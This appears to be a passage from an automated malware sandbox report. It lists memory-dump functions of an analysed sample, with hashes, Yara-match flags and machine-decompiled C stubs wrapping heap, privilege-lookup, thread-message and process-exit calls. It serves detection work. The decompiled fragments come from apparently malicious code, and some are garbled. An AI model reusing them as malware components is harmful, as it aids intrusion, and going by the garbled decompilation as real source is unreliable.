                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: be723f97a22115a84c2df667997c16cf00a40dfc5a526e41fee41bd745b69660
                                                                  • Instruction ID: 637c905627b5bb4a03c2226a37a8300c2a4b60c797d9970faddbf042d321cc0a
                                                                  • Opcode Fuzzy Hash: be723f97a22115a84c2df667997c16cf00a40dfc5a526e41fee41bd745b69660
                                                                  • Instruction Fuzzy Hash: 1C90026221181042D30065695C14B070045D7D0353F61C169A4184554CC9558872A561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 97fea27d785c315de790ce399a3fbe76edc4ac18f081c657f82872ca29ecf6e0
                                                                  • Instruction ID: ac975c46d5e0f7df8dca8235b86e792b2019ac7a740ae201914cac43a2613f33
                                                                  • Opcode Fuzzy Hash: 97fea27d785c315de790ce399a3fbe76edc4ac18f081c657f82872ca29ecf6e0
                                                                  • Instruction Fuzzy Hash: D790026230101003D240715964186064045E7E1351F61D065E4444554CD9558867A262
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 90ac4d2fe1e55ca7839606a2acd8236460e0320a3da30e0fda1234f3c1de92ce
                                                                  • Instruction ID: 97e9607d85c17da569d1c092a390032d692dd22a69bd0343887823db342f2310
                                                                  • Opcode Fuzzy Hash: 90ac4d2fe1e55ca7839606a2acd8236460e0320a3da30e0fda1234f3c1de92ce
                                                                  • Instruction Fuzzy Hash: 0390026A21301002D2807159640860A0045D7D1352FA1D469A4045558CC955887AA361
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ed21aabf9a0523f6bcb01e784ae1ca2ae1e5e5fec629bc4608bec6cebb3214d0
                                                                  • Instruction ID: 2f8e6501a8a7b22a223eba541d5298fd9ac55c90513cff6baae47b73a8a1c18b
                                                                  • Opcode Fuzzy Hash: ed21aabf9a0523f6bcb01e784ae1ca2ae1e5e5fec629bc4608bec6cebb3214d0
                                                                  • Instruction Fuzzy Hash: A890027231115402D210615994047060045D7D1351F61C465A4854558D86D588A2B162
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: aec05a608b2908f4fddfbdfb1ba356a9ab9f5a27c84442cb2f96a6149610f366
                                                                  • Instruction ID: 0a2e84f53e5d998816a2311ce4ee6503d69d22ba64237bff680257d2f5628551
                                                                  • Opcode Fuzzy Hash: aec05a608b2908f4fddfbdfb1ba356a9ab9f5a27c84442cb2f96a6149610f366
                                                                  • Instruction Fuzzy Hash: 2990027220101402D200659964086460045D7E0351F61D065A9054555EC6A588A2B171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                  • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                  • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                  • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateExitHeapProcess
                                                                  • String ID: &5A
                                                                  • API String ID: 1054155344-1617645808
                                                                  • Opcode ID: 2e66e6a7a6987ba16c5d3b59518e97e301cf0364225c2c18e49edfffa6983ba4
                                                                  • Instruction ID: 4d340a637d91a504f7ec019aa7c971abd630d8a16852c7a471311fcee033b8d8
                                                                  • Opcode Fuzzy Hash: 2e66e6a7a6987ba16c5d3b59518e97e301cf0364225c2c18e49edfffa6983ba4
                                                                  • Instruction Fuzzy Hash: E2F0E2352042007FD725CF648CC2ED33B689F94350F14459DF8489F146D93999028BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 50%
                                                                  			E00418466(void* __ebx, void* __edx, void* _a4, void* _a8, void* _a12) {
                                                                  				void* _t8;
                                                                  				void* _t27;
                                                                  				intOrPtr _t28;
                                                                  
                                                                  				asm("cmpsb");
                                                                  				_t8 = _t27;
                                                                  				_t28 =  *0x3e3c7c8c;
                                                                  				if (__ebx + __edx > 0) goto L3;
                                                                  				_push(_t28);
                                                                  			}






                                                                  0x0041846b
                                                                  0x0041846c
                                                                  0x0041846c
                                                                  0x0041846f
                                                                  0x00418470

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &5A
                                                                  • API String ID: 1279760036-1617645808
                                                                  • Opcode ID: c4417f9cb1bd3c7e41327d1f571a3a1a995e27b5edd346b78b70a7a274e56637
                                                                  • Instruction ID: e814b3f788798fc55ab987da9c8e1af4a159f266a532439d1aeea0fdc61fa0e2
                                                                  • Opcode Fuzzy Hash: c4417f9cb1bd3c7e41327d1f571a3a1a995e27b5edd346b78b70a7a274e56637
                                                                  • Instruction Fuzzy Hash: 26F08CB22002146FD724EF94DC84EEB776DEF84350F14859AF9485B281CA31EA05C7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 40%
                                                                  			E004184A0(intOrPtr _a4, char _a8, intOrPtr _a12, void* _a16) {
                                                                  				intOrPtr _t9;
                                                                  				void* _t10;
                                                                  				void* _t12;
                                                                  				void* _t15;
                                                                  
                                                                  				L00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                  				_t9 = _a12;
                                                                  				_t6 =  &_a8; // 0x413526
                                                                  				_t12 =  *_t6;
                                                                  				asm("les edx, [edx+edx*2]");
                                                                  				_push(_t9);
                                                                  				_t10 = RtlAllocateHeap(_t12); // executed
                                                                  				return _t10;
                                                                  			}







                                                                  0x004184b7
                                                                  0x004184bf
                                                                  0x004184c2
                                                                  0x004184c2
                                                                  0x004184c6
                                                                  0x004184cb
                                                                  0x004184cd
                                                                  0x004184d1

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &5A
                                                                  • API String ID: 1279760036-1617645808
                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                  • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                  • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                                                  				char _v67;
                                                                  				char _v68;
                                                                  				void* _t12;
                                                                  				intOrPtr* _t13;
                                                                  				int _t14;
                                                                  				long _t21;
                                                                  				intOrPtr* _t25;
                                                                  				void* _t26;
                                                                  				void* _t30;
                                                                  
                                                                  				_t30 = __eflags;
                                                                  				_v68 = 0;
                                                                  				L00419D30( &_v67, 0, 0x3f);
                                                                  				E0041A910( &_v68, 3);
                                                                  				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                  				_t13 = L00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                  				_t25 = _t13;
                                                                  				if(_t25 != 0) {
                                                                  					_t21 = _a8;
                                                                  					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                  					_t32 = _t14;
                                                                  					if(_t14 == 0) {
                                                                  						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                  					}
                                                                  					return _t14;
                                                                  				}
                                                                  				return _t13;
                                                                  			}












                                                                  0x00407270
                                                                  0x0040727f
                                                                  0x00407283
                                                                  0x0040728e
                                                                  0x0040729e
                                                                  0x004072ae
                                                                  0x004072b3
                                                                  0x004072ba
                                                                  0x004072bd
                                                                  0x004072ca
                                                                  0x004072cc
                                                                  0x004072ce
                                                                  0x004072eb
                                                                  0x004072eb
                                                                  0x00000000
                                                                  0x004072ed
                                                                  0x004072f2

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                  • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                  • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                  • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 58%
                                                                  			E004184D2(void* __eax, void* __edx, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                  				char _t11;
                                                                  
                                                                  				asm("das");
                                                                  				_t20 = __edi + 1;
                                                                  				asm("outsd");
                                                                  				asm("fistp dword [ebx+edi+0x67]");
                                                                  				_t8 = _a4;
                                                                  				_t3 = _t8 + 0xc74; // 0xc74
                                                                  				L00418DD0(_t20, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                  				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                  				return _t11;
                                                                  			}




                                                                  0x004184d2
                                                                  0x004184d7
                                                                  0x004184d8
                                                                  0x004184d9
                                                                  0x004184e3
                                                                  0x004184ef
                                                                  0x004184f7
                                                                  0x0041850d
                                                                  0x00418511

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: ec759ca4675290828cfe8f34caafb4ddace77c7b9895e535d52c12bc2a1b4cc5
                                                                  • Instruction ID: 7c0f2335b78284f7a1e217a06b805b6f8082d3efbb36eb685d58b34faf746ded
                                                                  • Opcode Fuzzy Hash: ec759ca4675290828cfe8f34caafb4ddace77c7b9895e535d52c12bc2a1b4cc5
                                                                  • Instruction Fuzzy Hash: 6FE0ED71204604AFDB14CF58CC88EE73769EF88364F104658FD089B782C631ED018BB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                  				char _t10;
                                                                  				void* _t15;
                                                                  
                                                                  				_t3 = _a4 + 0xc74; // 0xc74
                                                                  				L00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                  				return _t10;
                                                                  			}





                                                                  0x004184ef
                                                                  0x004184f7
                                                                  0x0041850d
                                                                  0x00418511

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                  • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                  • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                  				int _t10;
                                                                  				void* _t15;
                                                                  
                                                                  				L00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                  				return _t10;
                                                                  			}





                                                                  0x0041865a
                                                                  0x00418670
                                                                  0x00418674

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                  • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                  • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00418520(intOrPtr _a4, int _a8) {
                                                                  				void* _t10;
                                                                  
                                                                  				_t5 = _a4;
                                                                  				L00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                  				ExitProcess(_a8);
                                                                  			}




                                                                  0x00418523
                                                                  0x0041853a
                                                                  0x00418548

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                  • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                  • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 12fb9094e332aca5bd2c9ae3fb6b9b97e35cca9322bc65c6933af816ffd8bb54
                                                                  • Instruction ID: 0c3215f39203223c24339349c43f41ea1b481762c0b720e6d1b8de0bdd65cf9e
                                                                  • Opcode Fuzzy Hash: 12fb9094e332aca5bd2c9ae3fb6b9b97e35cca9322bc65c6933af816ffd8bb54
                                                                  • Instruction Fuzzy Hash: 68B09B729015D5C5D711D76056087177940F7D0751F76C0A5D2060641A4778C4D1F5B5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |
                                                                  • API String ID: 0-2343686810
                                                                  • Opcode ID: c9f1da1791d001eca30baa1496d93809ea24eff30b1421570a9e64967bdbc755
                                                                  • Instruction ID: 07b4bc81a2d7621d236600416e9602d99edca0640048f492613bc2595f3a5260
                                                                  • Opcode Fuzzy Hash: c9f1da1791d001eca30baa1496d93809ea24eff30b1421570a9e64967bdbc755
                                                                  • Instruction Fuzzy Hash: 5DE02B63A546448BC316EE5CE8C69F5F7E8EF06310F10239AD805DB512D30AD2264AD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a9c5042e839027f53ee0220f65cd49d58c420e3be21525708cdf3294fe2b5a4
                                                                  • Instruction ID: d1f61a1f0826c297f3b4f88d779ae460630c90a6185e913c340da72a4c58cd02
                                                                  • Opcode Fuzzy Hash: 9a9c5042e839027f53ee0220f65cd49d58c420e3be21525708cdf3294fe2b5a4
                                                                  • Instruction Fuzzy Hash: 2F90026230101402D202615954146060049D7D1395FA1C066E5454555D86658963F172
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1b8329fbaa9e2a14012a258e86c7db8fec8e48d6a06a227da707c2104ea673f
                                                                  • Instruction ID: 569db728960dd894bb1af00b8df073242ffe7d4b5584b0f96bba3f736c7f5593
                                                                  • Opcode Fuzzy Hash: c1b8329fbaa9e2a14012a258e86c7db8fec8e48d6a06a227da707c2104ea673f
                                                                  • Instruction Fuzzy Hash: 8A90027224101402D241715954046060049E7D0391FA1C066A4454554E86958A67FAA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aba2861b228a858c42cca557aa2ad080113b5fb61b0817ff5a1a1f7d6a398ea9
                                                                  • Instruction ID: 50a48cfe13d2cb22d8fd6f2c83fb7cfeed406dd0dfd33745ed1f265d3afdd162
                                                                  • Opcode Fuzzy Hash: aba2861b228a858c42cca557aa2ad080113b5fb61b0817ff5a1a1f7d6a398ea9
                                                                  • Instruction Fuzzy Hash: 919002A2601150434640B15958044065055E7E13513A1C175A4484560C86A88866E2A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7710c4dca4dffbfb764f8a9eb6127162361329c6d1b4387b369dcc3972c514f2
                                                                  • Instruction ID: 9fc2b72a0185a3b1edb09e80552e4ee6127d0e51746bc2a056ed56ae3ee4fb0a
                                                                  • Opcode Fuzzy Hash: 7710c4dca4dffbfb764f8a9eb6127162361329c6d1b4387b369dcc3972c514f2
                                                                  • Instruction Fuzzy Hash: 1D90027220101802D204615958046860045D7D0351F61C065AA054655E96A588A2B171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e24cfd02c4fcf4ac0d9f24754fb25339ee74f0ff4d480ba6f65b8f18c47ed1f
                                                                  • Instruction ID: 6f13fbd29106bb8a34cbf4c991ed938039b17694a49eb4eb3dce3f004d45b424
                                                                  • Opcode Fuzzy Hash: 7e24cfd02c4fcf4ac0d9f24754fb25339ee74f0ff4d480ba6f65b8f18c47ed1f
                                                                  • Instruction Fuzzy Hash: 4E9002A221101042D204615954047060085D7E1351F61C066A6184554CC5698C72A165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 321c1e1e77fbb45f7c5494613c8fc046b05183e427c03a51d7fe9730160d7233
                                                                  • Instruction ID: 701a25843c05156c8105ba61d43a1cc2539607e5f94de8a632a73d45cda9ae55
                                                                  • Opcode Fuzzy Hash: 321c1e1e77fbb45f7c5494613c8fc046b05183e427c03a51d7fe9730160d7233
                                                                  • Instruction Fuzzy Hash: CB900272A05010129240715958146464046E7E0791B65C065A4544554C89948A66A3E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fe70099f71a86a4b9ea0bcb4848ae103ac8e9294c8da7110d0bbb54fa63e0cd
                                                                  • Instruction ID: 8fac76a22ee0d0f2a624051eccd7de92a558d63bc5beff0480abd391dd690fd5
                                                                  • Opcode Fuzzy Hash: 8fe70099f71a86a4b9ea0bcb4848ae103ac8e9294c8da7110d0bbb54fa63e0cd
                                                                  • Instruction Fuzzy Hash: 7A9002E2201150924600A2599404B0A4545D7E0351B61C06AE5084560CC5658862E175
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e82f2cf93721a9dd47a704245525496c10637073d1eb2b1f513aee317149a855
                                                                  • Instruction ID: b4df95846cebfd9ed82958b3dfb4a29e0193128da393a07eb2c58bdfb5ff7d91
                                                                  • Opcode Fuzzy Hash: e82f2cf93721a9dd47a704245525496c10637073d1eb2b1f513aee317149a855
                                                                  • Instruction Fuzzy Hash: D8900266221010020245A559160450B0485E7D63A13A1C069F5446590CC6618876A361
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c9f45aedbcbeaac2c083463d7b5a9f04d0f54317636cee4501df8f4fbd56a02f
                                                                  • Instruction ID: d5dac0d0de899ae0a054fa6d593e412f8733831f7c3ba8f99474e8cd4b54b794
                                                                  • Opcode Fuzzy Hash: c9f45aedbcbeaac2c083463d7b5a9f04d0f54317636cee4501df8f4fbd56a02f
                                                                  • Instruction Fuzzy Hash: 159002A220141403D240655958046070045D7D0352F61C065A6094555E8A698C62B175
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 621ba2fc84cd12c9c2e037f5e2124aa8fb87b121b18dd8159941761130134edc
                                                                  • Instruction ID: 9c69a78628ff746e3d1181540bde0232b93256f3c937681fd77c034d2c141bb7
                                                                  • Opcode Fuzzy Hash: 621ba2fc84cd12c9c2e037f5e2124aa8fb87b121b18dd8159941761130134edc
                                                                  • Instruction Fuzzy Hash: FE90026220145442D24062595804B0F4145D7E1352FA1C06DA8186554CC9558866A761
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 38ba3b72e3843a31899ce42909fec31e51280d4ec84d93df83943941f59ad404
                                                                  • Instruction ID: bd95271ba52b0727cf5103fb14e4b63ba556527c545f9121800c4812b2e497f4
                                                                  • Opcode Fuzzy Hash: 38ba3b72e3843a31899ce42909fec31e51280d4ec84d93df83943941f59ad404
                                                                  • Instruction Fuzzy Hash: 8C90027220101842D20061595404B460045D7E0351F61C06AA4154654D8655C862B561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78743be7e136b582f2a51e52cead8ad5c4f3ece80c3d6b2568f9dd7970c68b0f
                                                                  • Instruction ID: 3d53ca2832130d757d3dd00e71f070f84a7731d9ae576a53f2e8334758dbac97
                                                                  • Opcode Fuzzy Hash: 78743be7e136b582f2a51e52cead8ad5c4f3ece80c3d6b2568f9dd7970c68b0f
                                                                  • Instruction Fuzzy Hash: 6590027220141402D200615958087470045D7D0352F61C065A9194555E86A5C8A2B571
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d628b1071da4e190d81c7580e70f77a90bb8d2ecfb29a361fbcc337362be1f3
                                                                  • Instruction ID: 8f7cf461df369404c90b61c88c1a225f3b6968fbcc00fe9aaeda96761e0c895f
                                                                  • Opcode Fuzzy Hash: 5d628b1071da4e190d81c7580e70f77a90bb8d2ecfb29a361fbcc337362be1f3
